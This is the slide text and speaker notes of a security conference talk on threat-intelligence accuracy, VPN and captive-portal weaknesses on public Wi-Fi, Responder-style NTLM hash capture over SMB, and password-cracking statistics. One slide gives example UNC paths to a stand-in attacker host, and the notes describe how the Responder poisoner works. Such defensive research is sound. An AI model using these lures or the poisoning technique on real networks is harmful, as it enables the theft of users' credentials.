Recommended
Recommended
More Related Content
What's hot
What's hot (20)
Similar to Confusing the myths with some facts
Similar to Confusing the myths with some facts (20)
More from Harry Gunns
More from Harry Gunns (16)
Recently uploaded
Recently uploaded (20)
Confusing the myths with some facts
- 1. 11/13/2019 1 T: +44 (0)1622 723400 | E: info@secdata.com | W: www.secdata.com CONFUSING THE MYTHS WITH SOME FACTS by Charl Van Der Walt @charlvdwalt
- 3. 11/13/2019 3
- 4. 11/13/2019 4 WHO’S ASKING THE QUESTIONS, FOR YOU? A journey through our own data to question simple truths we take for granted. In this presentation we will share the answers to selected questions we’ve asked ourselves about our own data and explain how we went about answering them and what they ultimately taught us. None of it is rocket science and most of it is sadly unsurprising, but all of it is clean, sincere, authentic and honest. Security Data Science in its most juvenile form.
- 6. 11/13/2019 6 http://www.centurylink.com/ business/enterprise/blog/thinkgig/3- major-benefits-of-intelligence-led-security we produce Intelligence led security is the collection, aggregation, correlation and analysis of both internal and external data to understand risks, identify threat actors, discover and minimize attacks or losses already underway, and understand and predict the methods and actions of likely adversaries.
- 7. 11/13/2019 7 A GOOD IDEA GETS COMODITISED
- 8. 11/13/2019 8 How efficient is Threat Intelligence about the behaviour of an IP in predicting future behaviour by that same IP? But does it work ?
- 9. 11/13/2019 9 Precision. 𝑷 𝒄𝒐𝒓𝒓𝒆𝒄𝒕𝒍𝒚 𝒑𝒓𝒆𝒅𝒊𝒄𝒕𝒆𝒅 = 𝟏 𝒐𝒃𝒔𝒆𝒓𝒗𝒆𝒅 = 𝟏) Given that a specific IP is given to be acting suspiciously by a Threat Intelligence source, what is the probability that the IP will be observed acting suspiciously again later? Threat Intelligence Lab Our T.I. petri dish environment Honeynet Lab Our honeynet petri dish environment 3.59% 14.73%
- 10. 11/13/2019 10 TWITTER DATA 1 10 100 1000 10000 100000 1000000 10000000 100000000 Mark Elon Me Mom Sis Dog Goal: 27,398,100 @charlvdwalt
- 11. 11/13/2019 11 SECTION 2 VIRTUALLY PRIVATE NETWORKS
- 12. 11/13/2019 12 The curious incident of the outbound 445 IP address on the InternetTwo employees at a hotel • Traffic send in the morning within one hour of each other • Same hotel and same complimentary Wi-Fi • Just before the VPN connected
- 13. 11/13/2019 13 SMB Port 445 • Server Message Block (SMB) protocol • Windows uses it to share files, printers and serial ports • NTLM authentication is used • Windows wants to make your life easy • This can be used to steal NTLM challenge-response password hashes from SMB clients • Attackers can trick a target into connecting to their SMB server • UNC paths in websites, documents, phishing emails etc • For example: • attacker.comshare-namefile.txt • file://///attacker.com/share/folder/file.txt
- 14. 11/13/2019 14 Two important clues Malware/Documents? Phishing emails? Watering hole attack?
- 15. 11/13/2019 15 66.96.162.92, in the kitchen, with a knife *.domain.com -> 66.96.102.92
- 16. 11/13/2019 16 domain.com, in the lounge, with a candle stick “Connection specific suffix can be configured manually in the interface properties or distributed dynamically through DHCP IP address assignment of DHCP option 15”
- 18. 11/13/2019 18
- 19. 11/13/2019 19 Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.“
- 21. 11/13/2019 21 How effective are modern VPN products at protecting us against actual contemporary threats? But does it work ?
- 22. 11/13/2019 22
- 23. 11/13/2019 23
- 24. 11/13/2019 24 ‘Free Wifi’ Corporate HQ X X
- 25. 11/13/2019 25
- 26. 11/13/2019 26
- 27. 11/13/2019 27
- 28. 11/13/2019 28
- 29. 11/13/2019 29
- 30. 11/13/2019 30
- 31. 11/13/2019 31
- 32. 11/13/2019 32
- 33. 11/13/2019 33 Lock down mode is designed to prohibit network communication outside of the VPN Tunnel when the … client is attempting to create a VPN connection to the … Connect Secure device.“
- 34. 11/13/2019 34
- 35. 11/13/2019 35
- 36. 11/13/2019 36
- 37. 11/13/2019 37
- 38. 11/13/2019 38
- 39. 11/13/2019 39 DNS Lookup Encrypted Tunnel Poisoned Lookup
- 40. 11/13/2019 40
- 41. 11/13/2019 41
- 42. 11/13/2019 42 SECTION 3 THE PASSWORD PROBLEM
- 43. 11/13/2019 43 0% 10% 20% 30% 40% 50% 60% 70% 80% 90% 100% AFRICA AUS UK US ZA PASSWORDS CRACKED PER COUNTRY 80%
- 44. 11/13/2019 44 0 50000 100000 150000 200000 250000 300000 350000 400000 450000 500000 1 4 6 8 10 12 14 16 18 20 22 24 26 28 30 32 34 36 38 40 42 45 • 88% of passwords cracked were 8 - 12 characters long. • Enterprise users seem to be choosing long passwords • But length appears to have a negligible impact on security
- 45. 11/13/2019 45 PREDICTABLE FORMATS - 2018
- 46. 11/13/2019 46 SECTION 4 MAKING IT RIGHT
- 47. 11/13/2019 47
- 48. 11/13/2019 48
- 49. 11/13/2019 49
- 51. 11/13/2019 51 • The desktop is the target • Direct access to user data • The desktop is the user • Inherited privileges on other systems • Easy access to domain credentials • Direct access to user location, video and audio • The desktop is a foothold • Ideal location for lateral movement and pivoting • Numerous channels for exfiltration • Excessive event data makes monitoring hard • The desktop is a soft target • The desktop is a big target • User behaviour creates complex human- machine system • Directly accessible from the Internet!
- 52. 11/13/2019 52
- 53. 11/13/2019 53 While most enterprises assume that the internal network is a safe environment in which to expose corporate applications, Google’s experience has proven that this faith is misplaced. Rather, one should assume that an internal network is as fraught with danger as the public Internet and build enterprise applications based upon this assumption.
- 54. 11/13/2019 54 KNOW who You Are KNOW your Footprint KNOW your Threat Model KNOW your Vulnerabilities KNOW how you react under assault KNOW that something happened KNOW what happened KNOW what you’re going to do next
- 55. 11/13/2019 55 T: +44 (0)1622 723400 | E: info@secdata.com | W: www.secdata.com THANK YOU Questions? @charlvdwalt
Editor's Notes
- To do my job I have a lot of data. Between two dedicated research units, one of the worlds acclaimed Attack & Penetration Testing teams, a Managed Vulnerability Scanning Service and a Managed SIEM Service that collects, stores and analyses millions of customer security logs a day, we have the unique privilege of being able to look deep into the data to understand where our customers are vulnerable, how they’re being attacked and where the attackers are being successful. But in truth we never really do that, do we? As an industry we’re much too busy shouting each other down, inventing new acronyms or designing logos for our branded vulnerabilities to earnestly test our dearly held preconceptions about the ‘truths’ in our space. A while back I was debating with my team whether we should inform customers about an iOS exploit we were tracking. There was a strong argument that the effort would be wasted because iOS is ‘automatically’ patched. Instead of just arguing about it, we decided to test. Three million User Agents, endless struggles with Hadoop, Drill, Python & Excel and untold hours on the web followed, but finally we had a result: Almost 80% of iOS iOS devices analysed are consistently patched to the latest levels, but almost 20% are still vulnerable to all the bugs and exploits publicly disclosed since September 2017.
- So this is basically how it works – it’s a very practical and simple variant of a DNS spoofing ‘attack’, trivial to execute by anyone who owns or controls the Wifi AP, whether deliberately or by accident: Victim gets IP configuration detail assigned by the Wifi API, including DNS server & domain search suffix Client requests the IP address of a site or server by name The response comes from the DNS server assigned by the Wifi API. Or alternatively the search domain which results in the DNS query comes from the Wifi API. Either way, the Wifi API controls DNS, which directs all connectivity Therefore any TCP connection can be redirected to a potentially malicious server by the access point manipulating the DNS responses. That malicious server could be on the Internet (as with the case we originally investigated) or could be located on the LAN, or even on the AP itself. A classic and simple way to exploit this systemic vulnerability is via a SMB ‘responder’ attack
- We started to test the behaviour on other networks we use … and immediately spot exactly the same behaviour. This time there is no DNS wildcard so there is no immediate risk, but the fundamental condition is the same – DNS requests for unqualified host names with domain search suffices defined by the Wifi AP appended.
- Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. This tool is first an LLMNR and NBT-NS responder, it will answer to *specific* NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: http://support.microsoft.com/kb/163409). By default, the tool will only answers to File Server Service request, which is for SMB. The concept behind this, is to target our answers, and be stealthier on the network. This also helps to ensure that we don’t break legitimate NBT-NS behavior. You can set the -r option to 1 via command line if you want this tool to answer to the Workstation Service request name suffix.
- There are many ways in which we mitigate against a ‘responder’ class of threat, including personal firewalls and EDP/R systems (which is what ultimately saved SecureData) but the primary defensive mechanism when using untrusted networks is the VPN. The basic principle is that the VPN encrypts and tunnels all outbound traffic as it leaves the client and ‘drops’ it in a safe location (e.g. in the corporate network). A virtual network device is created on the client where trusted DNS servers can be configured. This protects against a rogue DNS server whilst also protecting the privacy of data traversing the network. * Not sure whether this mitigates against rogue DNS search suffices – IT DOESN’T
- But here’s the thing. I spend much of life travelling and I’m therefore almost always of 3rd party Wifi networks. We have numerous corporate VPN solutions to cater for this that provide access control and confidentiality.
- But I get to wondering … what about this? When I need to interact with a captive portal of some kind I am connected to the Wifi network but not to the Internet. The VPN tunnel can’t established and so it can’t offer me any protection. I’m vulnerable to both DNS and network Attacker in the Middle risks.
- With a captive portal in play I remain ‘trapped’ on the Wifi LAN until I’ve finished interacting the portal. Until that’s done and I (hopefully) have full internet access I am vulnerable to both DNS and network manipulation of my traffic, plus snooping of any network traffic my device emits.
- This interaction captures that state. The OS and various applications all try determine whether they have internet access by connecting to known internet resources, as long as they receive the redirect to a another site the machine knows that its connected to the WLAN, but not to the Internet.
- This is how it looks when internet connectivity is established. Instead of a 302 we get a 200 with the content that should be d
- Here’s an example of a very simple and innocent privacy violation – the domain name of my machine plus any other machine account information being broadcast onto the local network for anyone to see. My VPN connection is not yet established, so it doesn’t prevent this
- Because all my traffic outbound traffic is being ‘captured’ by the captive portal behaviour, any applications attempting to connected outward and deploying SSL/TLS report security exceptions. The server they are communicating with on the network cannot (theoretically at least) present the expected cryptographic certificate and therefore they either warn me, prompt me or simply fail
- The same is true when I’m using a mobile phone.
- So at this point the only thing protecting my traffic and defending me from attacker-in-the-middle and credential stealing attacks launched on the internal network via the wifi AP or the captive portal is the enforcement of SSL / TLS by the individual pages or apps on the mobile. The problem is … these are completely beyond our control.
- Here are some examples of services that would behave like this. One can see cloud services, enterprise internet services and internal services all being requested. The response to those requests at this point is fully under the control of the Wifi AP.
- One response to mitigating this threat is via the use of VPN ‘lock down’ or ‘Captive Portal Mitigation’, which is available in many VPN products. The idea is that the VPN blocks all outbound connections and then uses its own built-in browser to negotiate the captive portal until Internet connectivity can be established and the VPN built. https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB40363 https://docs.pulsesecure.net/WebHelp/PDC/9.0R1/Content/PDC_AdminGuide_9.0R1/Captive_Portal_Remediation.htm Lock-down mode prevents external browsers from communicating before the VPN is established, so external browsers cannot be used for captive-portal remediation with lock-down mode enabled. The embedded browser is the only option for remediating a captive portal in lock-down mode.
- Here we see the Lock Down in action. Notice how the outbound ping is blocked until after the portal is negotiated and the VPN established
- Problem is – DNS traffic is still allowed. And that’s not all.
- https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB40363 https://docs.pulsesecure.net/WebHelp/PDC/9.0R1/Content/PDC_AdminGuide_9.0R1/Captive_Portal_Remediation.htm It seems lock-down mode is designed to block 'traditional' outbound internet connections, but not a lot of discovery stuff (like DNS and MDNS) or 'internal' stuff like SMB. In other words … Responder type attacks are *still* possible, even with ‘Lock Down’ mode enabled. Lock-down mode prevents external browsers from communicating before the VPN is established, so external browsers cannot be used for captive-portal remediation with lock-down mode enabled. The embedded browser is the only option for remediating a captive portal in lock-down mode.
- Activating a mapped drive initiates the SMB connection we see below. Note that the malicious Responder server is located interal to the LAN in this case.
- There’s another problem – even once established the VPN is fully protecting us against Responder type attacks, unless there are also other mitigations in place. Here’s what happens when the Internet connection is established and the VPN finally kicks in. Note the DNS lookup for our VPN gateway server, which is successfully resolved. We see the TCP connection being established to the gateway and the correct certificate being presented. Then we can see the TCP stream that represents the VPN tunnel
- Scarily – even after the VPN is established – if the DNS search suffix is not specifically configured – DNS search suffices can still be used to poison DNS requests, direct them at malicious name servers and resolve valuable internal resources to malicious hosts for responder or other AiTM attacks
- There’s another problem – even once established the VPN is fully protecting us against Responder type attacks, unless there are also other mitigations in place. Here’s what happens when the Internet connection is established and the VPN finally kicks in. Note the DNS lookup for our VPN gateway server, which is successfully resolved. We see the TCP connection being established to the gateway and the correct certificate being presented. Then we can see the TCP stream that represents the VPN tunnel
- There’s another problem – even once established the VPN is fully protecting us against Responder type attacks, unless there are also other mitigations in place. Here’s what happens when the Internet connection is established and the VPN finally kicks in. Note the DNS lookup for our VPN gateway server, which is successfully resolved. We see the TCP connection being established to the gateway and the correct certificate being presented. Then we can see the TCP stream that represents the VPN tunnel
- Normalised – to remove double audits.
- Only lowercase alpha = 2194 (0.48%) Only uppercase alpha = 41 (0.01%) Only alpha = 2235 (0.49%) Only numeric = 301 (0.07%) First capital last symbol = 47341 (10.43%) First capital last number = 259236 (57.1%)
- There’s another problem – even once established the VPN is fully protecting us against Responder type attacks, unless there are also other mitigations in place. Here’s what happens when the Internet connection is established and the VPN finally kicks in. Note the DNS lookup for our VPN gateway server, which is successfully resolved. We see the TCP connection being established to the gateway and the correct certificate being presented. Then we can see the TCP stream that represents the VPN tunnel
- There’s another problem – even once established the VPN is fully protecting us against Responder type attacks, unless there are also other mitigations in place. Here’s what happens when the Internet connection is established and the VPN finally kicks in. Note the DNS lookup for our VPN gateway server, which is successfully resolved. We see the TCP connection being established to the gateway and the correct certificate being presented. Then we can see the TCP stream that represents the VPN tunnel
- https://beyondcorp.com/ When a highly sophisticated APT attack named Operation Aurora occurred in 2009, Google began an internal initiative to reimagine their security architecture with regards to how employees and devices access internal applications.
- https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43231.pdf
- 16. These are the key elements of self-knowledge we believe on should seek to achieve. Each of these conveniently map to a specific practice the security team can undertake: Identify and Authentication Footprinting Threat Modeling Vulnerability Discovery Objective-based penetration testing or red / purple teaming Honeypots, tokens and other traps Detection and Threat Hunting Response, documented and regularly practiced.